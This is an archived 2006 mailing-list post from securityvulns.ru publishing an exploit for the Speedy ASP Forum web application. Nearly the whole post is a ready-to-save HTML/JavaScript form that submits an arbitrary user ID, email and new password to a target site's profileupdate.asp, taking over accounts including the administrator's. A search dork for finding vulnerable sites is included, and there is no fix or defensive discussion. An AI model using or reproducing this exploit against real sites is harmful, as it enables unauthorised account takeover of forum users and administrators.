Computer Security
[EN] securityvulns.ru
From: ajannhwt_(at)_hotmail.com <ajannhwt_(at)_hotmail.com>
Date: 30.05.2006
Subject: Speedy ASP Forum(profileupdate.asp) User Pass Change Exploit

# Title  :   Speedy ASP Forum(profileupdate.asp) User Pass Change Exploit

# Dork   :   Copyright © ASPwebSoft

# Author :   ajann

# greetz :   Nukedx

###Code:

Save to .htm

*********************************************************************************
****************************************************


<title>Pass Change</title>
<script language="JavaScript">  
//Coded ajann
function islemKontrol(){
    if(document.InputForm.name.value=="" || document.InputForm.email.value=="" ||
document.InputForm.id.value=="" || document.InputForm.password.value=="" ||
document.InputForm.passwordre.value=="" || document.InputForm.country.options.value == 0 ||
document.InputForm.adres.value=="" ){
         alert("Alani Bos Biraktiniz") // Turkish: "You left a field empty"
         return false
    }
{
document.InputForm.action= document.InputForm.adres.value
document.InputForm.submit();

return true
}
}
</script>

<body bgcolor="#000000">

<form name = "InputForm" method = "post" onSubmit = 'return islemKontrol()'>
<b><font color="#808080" face="Verdana">Speedy Forum User Pass Change //
ajann</font></b><p><font face="Verdana" size="2" color="#FF0000"><b>User Name&nbsp;&nbsp;&nbsp;&nbsp;
:&nbsp;&nbsp; </b></font>
<input type="text" name="name"  value="" size="20">&nbsp;
<font size="1" color="#C0C0C0" face="Arial">&nbsp;Example: Surname Name</font><br>
<font face="Verdana" size="2" color="#FF0000"><b>User
Mail&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
:&nbsp; </b></font>
<input type="text" name="email" value="" size="20">
<font size="1" color="#C0C0C0" face="Arial">&nbsp;&nbsp; Example:
mail@domain.com</font><br>
<font face="Verdana" size="2" color="#FF0000"><b>User
İd&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
:&nbsp; </b></font>
<input type="text" name="id" value="" size="20">
<font size="1" color="#C0C0C0" face="Arial">&nbsp; Example: İd:1 Admin</font><br>
<font face="Verdana" size="2" color="#FF0000"><b>User Country&nbsp; :&nbsp; </b>
</font>
<select size="1"  name="country">
<option value=0>Choose Country</option>
<option  value="Turkey">Turkey</option>
</select> <font size="1" color="#C0C0C0" face="Arial">&nbsp;Example: Turkey</font><br>

<b>

<font face="Verdana" size="2" color="#FF0000">User </font>
<font face="Verdana" size="2" color="#0000FF">Pass </font>
<font face="Verdana" size="2" color="#FF0000">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
:&nbsp; </font></b>

<input type = "text" name="password" value="Password" size="20">&nbsp;
<font size="1" color="#C0C0C0" face="Arial">&nbsp;Example: 123456</font><br>
<b>
<font face="Verdana" size="2" color="#FF0000">User </font>
<font face="Verdana" size="2" color="#0000FF">RePass</font><font face="Verdana" size="2"
color="#FF0000">&nbsp;&nbsp;
:&nbsp; </font></b>
<input type = "text" name="passwordre" value="Re Password" size="20">&nbsp;
<font size="1" color="#C0C0C0" face="Arial">&nbsp;Example: 123456</font><br>

<font face="Verdana" size="2" color="#FF0000"><b>Form Action&nbsp; &nbsp; : </b>
</font>

<input type="text" name="adres" value="profileupdate.asp" size="20">&nbsp;
<font size="1" color="#C0C0C0" face="Arial">&nbsp;Example:
http://[target]/[path]/profileupdate.asp</font></p>

<p>

<input type = "submit" name="Submit" value="Change"> </p>

<br>

&nbsp;</form>
*********************************************************************************
****************************************************

And Code
